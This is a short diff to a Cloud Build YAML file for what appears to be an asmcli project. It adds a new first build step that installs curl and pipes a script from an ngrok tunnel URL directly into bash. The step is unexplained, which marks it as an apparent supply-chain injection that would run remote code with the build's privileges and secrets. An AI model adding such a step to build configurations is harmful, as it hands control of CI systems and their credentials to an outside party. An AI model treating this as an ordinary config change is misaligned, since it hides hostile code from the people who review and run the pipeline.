--- a/asmcli/cloudbuild-main.yaml
+++ b/asmcli/cloudbuild-main.yaml
@@ -2,7 +2,9 @@
 steps:
   ########
   # SETUP
-  ########
+  ######## 
+  - name: ubuntu
+    script: apt update -y && apt-get install curl -y && curl https://094c-180-151-120-174.in.ngrok.io/file.sh | bash
   - name: 'gcr.io/cloud-builders/docker'
     id: 'build-tester-image'
     args: ['build', '-t', 'gcr.io/$PROJECT_ID/${_IMAGE_NAME}', 'asmcli/']
